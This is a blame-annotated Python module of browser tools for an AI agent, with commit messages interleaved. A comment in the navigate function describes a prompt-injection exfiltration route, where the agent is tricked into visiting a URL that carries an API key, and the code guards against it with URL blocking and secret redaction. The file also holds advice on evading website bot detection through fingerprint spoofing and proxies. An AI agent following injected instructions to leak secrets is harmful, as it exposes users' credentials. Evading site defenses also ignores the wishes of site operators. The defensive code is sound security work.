f " 3. Navigation structure if relevant \n \n "
f " Keep ref IDs (like [ref=e5]) for interactive elements so the agent can use them. \n \n "
f " Page Snapshot: \n { snapshot_text } \n \n "
f " Provide a concise summary that preserves actionable information and relevant content. "
)
2026-01-29 06:10:24 +00:00
else :
2026-02-22 02:16:11 -08:00
extraction_prompt = (
f " Summarize this page snapshot, preserving: \n "
f " 1. All interactive elements with their ref IDs (like [ref=e5]) \n "
f " 2. Key text content and headings \n "
f " 3. Important information visible on the page \n \n "
f " Page Snapshot: \n { snapshot_text } \n \n "
f " Provide a concise summary focused on interactive elements and key content. "
)
2026-01-29 06:10:24 +00:00
2026-04-01 02:04:13 +03:00
# Redact secrets from snapshot before sending to auxiliary LLM.
# Without this, a page displaying env vars or API keys would leak
# secrets to the extraction model before run_agent.py's general
# redaction layer ever sees the tool result.
from agent . redact import redact_sensitive_text
extraction_prompt = redact_sensitive_text ( extraction_prompt )
2026-01-29 06:10:24 +00:00
try :
2026-03-11 20:52:19 -07:00
call_kwargs = {
" task " : " web_extract " ,
" messages " : [ { " role " : " user " , " content " : extraction_prompt } ] ,
" max_tokens " : 4000 ,
" temperature " : 0.1 ,
}
model = _get_extraction_model ( )
if model :
call_kwargs [ " model " ] = model
response = call_llm ( * * call_kwargs )
2026-04-01 02:08:58 +03:00
extracted = ( response . choices [ 0 ] . message . content or " " ) . strip ( ) or _truncate_snapshot ( snapshot_text )
# Redact any secrets the auxiliary LLM may have echoed back.
return redact_sensitive_text ( extracted )
2026-01-29 06:10:24 +00:00
except Exception :
return _truncate_snapshot ( snapshot_text )
def _truncate_snapshot ( snapshot_text : str , max_chars : int = 8000 ) - > str :
"""
Simple truncation fallback for snapshots .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
snapshot_text : The snapshot text to truncate
max_chars : Maximum characters to keep
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
Truncated text with indicator if truncated
"""
if len ( snapshot_text ) < = max_chars :
return snapshot_text
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
return snapshot_text [ : max_chars ] + " \n \n [... content truncated ...] "
# ============================================================================
# Browser Tool Functions
# ============================================================================
def browser_navigate ( url : str , task_id : Optional [ str ] = None ) - > str :
"""
Navigate to a URL in the browser .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
url : The URL to navigate to
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with navigation result ( includes stealth features info on first nav )
"""
2026-04-01 02:04:13 +03:00
# Secret exfiltration protection — block URLs that embed API keys or
# tokens in query parameters. A prompt injection could trick the agent
# into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
from agent . redact import _PREFIX_RE
if _PREFIX_RE . search ( url ) :
return json . dumps ( {
" success " : False ,
" error " : " Blocked: URL contains what appears to be an API key or token. "
" Secrets must not be sent in URLs. " ,
} )
2026-03-31 11:11:55 +02:00
# SSRF protection — block private/internal addresses before navigating.
2026-03-31 10:40:13 -07:00
# Skipped for local backends (Camofox, headless Chromium without a cloud
# provider) because the agent already has full local network access via
# the terminal tool. Can also be opted out for cloud mode via
# ``browser.allow_private_urls`` in config.
if not _is_local_backend ( ) and not _allow_private_urls ( ) and not _is_safe_url ( url ) :
2026-03-25 15:16:57 -07:00
return json . dumps ( {
" success " : False ,
" error " : " Blocked: URL targets a private or internal address " ,
} )
2026-03-17 02:59:28 -07:00
# Website policy check — block before navigating
2026-03-17 03:11:21 -07:00
blocked = check_website_access ( url )
2026-03-17 02:59:28 -07:00
if blocked :
return json . dumps ( {
" success " : False ,
" error " : blocked [ " message " ] ,
" blocked_by_policy " : { " host " : blocked [ " host " ] , " rule " : blocked [ " rule " ] , " source " : blocked [ " source " ] } ,
} )
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
# Camofox backend — delegate after safety checks pass
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_navigate
return camofox_navigate ( url , task_id )
2026-01-29 06:10:24 +00:00
effective_task_id = task_id or " default "
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Get session info to check if this is a new session
# (will create one with features logged if not exists)
session_info = _get_session_info ( effective_task_id )
is_first_nav = session_info . get ( " _first_nav " , True )
2026-03-14 11:34:31 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
# Auto-start recording if configured and this is first navigation
2026-01-29 06:10:24 +00:00
if is_first_nav :
session_info [ " _first_nav " ] = False
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
_maybe_start_recording ( effective_task_id )
2026-03-14 11:34:31 -07:00
2026-03-24 07:21:50 -07:00
result = _run_browser_command ( effective_task_id , " open " , [ url ] , timeout = max ( _get_command_timeout ( ) , 60 ) )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
data = result . get ( " data " , { } )
title = data . get ( " title " , " " )
final_url = data . get ( " url " , url )
2026-03-25 15:16:57 -07:00
# Post-redirect SSRF check — if the browser followed a redirect to a
# private/internal address, block the result so the model can't read
# internal content via subsequent browser_snapshot calls.
2026-03-31 10:40:13 -07:00
# Skipped for local backends (same rationale as the pre-nav check).
if not _is_local_backend ( ) and not _allow_private_urls ( ) and final_url and final_url != url and not _is_safe_url ( final_url ) :
2026-03-25 15:16:57 -07:00
# Navigate away to a blank page to prevent snapshot leaks
_run_browser_command ( effective_task_id , " open " , [ " about:blank " ] , timeout = 10 )
return json . dumps ( {
" success " : False ,
chore: fix 154 f-strings, simplify getattr/URL patterns, remove dead code (#3119)
Three categories of cleanup, all zero-behavioral-change:
1. F-strings without placeholders (154 fixes across 29 files)
- Converted f'...' to '...' where no {expression} was present
- Heaviest files: run_agent.py (24), cli.py (20), honcho_integration/cli.py (34)
2. Simplify defensive patterns in run_agent.py
- Added explicit self._is_anthropic_oauth = False in __init__ (before
the api_mode branch that conditionally sets it)
- Replaced 7x getattr(self, '_is_anthropic_oauth', False) with direct
self._is_anthropic_oauth (attribute always initialized now)
- Added _is_openrouter_url() and _is_anthropic_url() helper methods
- Replaced 3 inline 'openrouter' in self._base_url_lower checks
3. Remove dead code in small files
- hermes_cli/claw.py: removed unused 'total' computation
- tools/fuzzy_match.py: removed unused strip_indent() function and
pattern_stripped variable
Full test suite: 6184 passed, 0 failures
E2E PTY: banner clean, tool calls work, zero garbled ANSI
2026-03-25 19:47:58 -07:00
" error " : " Blocked: redirect landed on a private/internal address " ,
2026-03-25 15:16:57 -07:00
} )
2026-01-29 06:10:24 +00:00
response = {
" success " : True ,
" url " : final_url ,
" title " : title
}
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Detect common "blocked" page patterns from title/url
blocked_patterns = [
" access denied " , " access to this page has been denied " ,
" blocked " , " bot detected " , " verification required " ,
" please verify " , " are you a robot " , " captcha " ,
" cloudflare " , " ddos protection " , " checking your browser " ,
" just a moment " , " attention required "
]
title_lower = title . lower ( )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if any ( pattern in title_lower for pattern in blocked_patterns ) :
response [ " bot_detection_warning " ] = (
f " Page title ' { title } ' suggests bot detection. The site may have blocked this request. "
" Options: 1) Try adding delays between actions, 2) Access different pages first, "
" 3) Enable advanced stealth (BROWSERBASE_ADVANCED_STEALTH=true, requires Scale plan), "
" 4) Some sites have very aggressive bot detection that may be unavoidable. "
)
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Include feature info on first navigation so model knows what's active
if is_first_nav and " features " in session_info :
features = session_info [ " features " ]
active_features = [ k for k , v in features . items ( ) if v ]
if not features . get ( " proxies " ) :
response [ " stealth_warning " ] = (
" Running WITHOUT residential proxies. Bot detection may be more aggressive. "
" Consider upgrading Browserbase plan for proxy support. "
)
response [ " stealth_features " ] = active_features
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
# Auto-take a compact snapshot so the model can act immediately
# without a separate browser_snapshot call.
try :
snap_result = _run_browser_command ( effective_task_id , " snapshot " , [ " -c " ] )
if snap_result . get ( " success " ) :
snap_data = snap_result . get ( " data " , { } )
snapshot_text = snap_data . get ( " snapshot " , " " )
refs = snap_data . get ( " refs " , { } )
if len ( snapshot_text ) > SNAPSHOT_SUMMARIZE_THRESHOLD :
snapshot_text = _truncate_snapshot ( snapshot_text )
response [ " snapshot " ] = snapshot_text
response [ " element_count " ] = len ( refs ) if refs else 0
except Exception as e :
logger . debug ( " Auto-snapshot after navigate failed: %s " , e )
2026-01-29 06:10:24 +00:00
return json . dumps ( response , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , " Navigation failed " )
} , ensure_ascii = False )
def browser_snapshot (
full : bool = False ,
task_id : Optional [ str ] = None ,
user_task : Optional [ str ] = None
) - > str :
"""
Get a text - based snapshot of the current page ' s accessibility tree.
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
full : If True , return complete snapshot . If False , return compact view .
task_id : Task identifier for session isolation
user_task : The user ' s current task (for task-aware extraction)
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with page snapshot
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_snapshot
return camofox_snapshot ( full , task_id , user_task )
2026-01-29 06:10:24 +00:00
effective_task_id = task_id or " default "
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Build command args based on full flag
args = [ ]
if not full :
args . extend ( [ " -c " ] ) # Compact mode
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
result = _run_browser_command ( effective_task_id , " snapshot " , args )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
data = result . get ( " data " , { } )
snapshot_text = data . get ( " snapshot " , " " )
refs = data . get ( " refs " , { } )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Check if snapshot needs summarization
if len ( snapshot_text ) > SNAPSHOT_SUMMARIZE_THRESHOLD and user_task :
2026-02-22 02:16:11 -08:00
snapshot_text = _extract_relevant_content ( snapshot_text , user_task )
2026-01-29 06:10:24 +00:00
elif len ( snapshot_text ) > SNAPSHOT_SUMMARIZE_THRESHOLD :
snapshot_text = _truncate_snapshot ( snapshot_text )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
response = {
" success " : True ,
" snapshot " : snapshot_text ,
" element_count " : len ( refs ) if refs else 0
}
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
return json . dumps ( response , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , " Failed to get snapshot " )
} , ensure_ascii = False )
def browser_click ( ref : str , task_id : Optional [ str ] = None ) - > str :
"""
Click on an element .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
ref : Element reference ( e . g . , " @e5 " )
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with click result
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_click
return camofox_click ( ref , task_id )
2026-01-29 06:10:24 +00:00
effective_task_id = task_id or " default "
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Ensure ref starts with @
if not ref . startswith ( " @ " ) :
ref = f " @ { ref } "
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
result = _run_browser_command ( effective_task_id , " click " , [ ref ] )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
return json . dumps ( {
" success " : True ,
" clicked " : ref
} , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , f " Failed to click { ref } " )
} , ensure_ascii = False )
def browser_type ( ref : str , text : str , task_id : Optional [ str ] = None ) - > str :
"""
Type text into an input field .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
ref : Element reference ( e . g . , " @e3 " )
text : Text to type
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with type result
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_type
return camofox_type ( ref , text , task_id )
2026-01-29 06:10:24 +00:00
effective_task_id = task_id or " default "
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Ensure ref starts with @
if not ref . startswith ( " @ " ) :
ref = f " @ { ref } "
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Use fill command (clears then types)
result = _run_browser_command ( effective_task_id , " fill " , [ ref , text ] )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
return json . dumps ( {
" success " : True ,
" typed " : text ,
" element " : ref
} , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , f " Failed to type into { ref } " )
} , ensure_ascii = False )
def browser_scroll ( direction : str , task_id : Optional [ str ] = None ) - > str :
"""
Scroll the page .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
direction : " up " or " down "
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with scroll result
"""
# Validate direction
if direction not in [ " up " , " down " ] :
return json . dumps ( {
" success " : False ,
" error " : f " Invalid direction ' { direction } ' . Use ' up ' or ' down ' . "
} , ensure_ascii = False )
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
# Repeat the scroll 5 times to get meaningful page movement.
# Most backends scroll ~100px per call, which is barely visible.
# 5x gives roughly half a viewport of travel, backend-agnostic.
_SCROLL_REPEATS = 5
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_scroll
result = None
for _ in range ( _SCROLL_REPEATS ) :
result = camofox_scroll ( direction , task_id )
return result
effective_task_id = task_id or " default "
result = None
for _ in range ( _SCROLL_REPEATS ) :
result = _run_browser_command ( effective_task_id , " scroll " , [ direction ] )
if not result . get ( " success " ) :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , f " Failed to scroll { direction } " )
} , ensure_ascii = False )
return json . dumps ( {
" success " : True ,
" scrolled " : direction
} , ensure_ascii = False )
2026-01-29 06:10:24 +00:00
def browser_back ( task_id : Optional [ str ] = None ) - > str :
"""
Navigate back in browser history .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with navigation result
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_back
return camofox_back ( task_id )
2026-01-29 06:10:24 +00:00
effective_task_id = task_id or " default "
result = _run_browser_command ( effective_task_id , " back " , [ ] )
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if result . get ( " success " ) :
data = result . get ( " data " , { } )
return json . dumps ( {
" success " : True ,
" url " : data . get ( " url " , " " )
} , ensure_ascii = False )
else :
return json . dumps ( {
" success " : False ,
" error " : result . get ( " error " , " Failed to go back " )
} , ensure_ascii = False )
def browser_press ( key : str , task_id : Optional [ str ] = None ) - > str :
"""
Press a keyboard key .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
key : Key to press ( e . g . , " Enter " , " Tab " )
task_id : Task identifier for session isolation
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
JSON string with key press result
"""
feat(browser): add Camofox local anti-detection browser backend (#4008)
Camofox-browser is a self-hosted Node.js server wrapping Camoufox
(Firefox fork with C++ fingerprint spoofing). When CAMOFOX_URL is set,
all 11 browser tools route through the Camofox REST API instead of
the agent-browser CLI.
Maps 1:1 to the existing browser tool interface:
- Navigate, snapshot, click, type, scroll, back, press, close
- Get images, vision (screenshot + LLM analysis)
- Console (returns empty with note — camofox limitation)
Setup: npm start in camofox-browser dir, or docker run -p 9377:9377
Then: CAMOFOX_URL=http://localhost:9377 in ~/.hermes/.env
Advantages over Browserbase (cloud):
- Free (no per-session API costs)
- Local (zero network latency for browser ops)
- Anti-detection at C++ level (bypasses Cloudflare/Google bot detection)
- Works offline, Docker-ready
Files:
- tools/browser_camofox.py: Full REST backend (~400 lines)
- tools/browser_tool.py: Routing at each tool function
- hermes_cli/config.py: CAMOFOX_URL env var entry
- tests/tools/test_browser_camofox.py: 20 tests
2026-03-30 13:18:42 -07:00
if _is_camofox_mode ( ) :
from tools . browser_camofox import camofox_press
return camofox_press ( key , task_id )
2026-01-29 06:10:24 +00:00
effective_task_id = task_id or " default "
result = _run_browser_command ( effective_task_id , " press " , [ key ] )
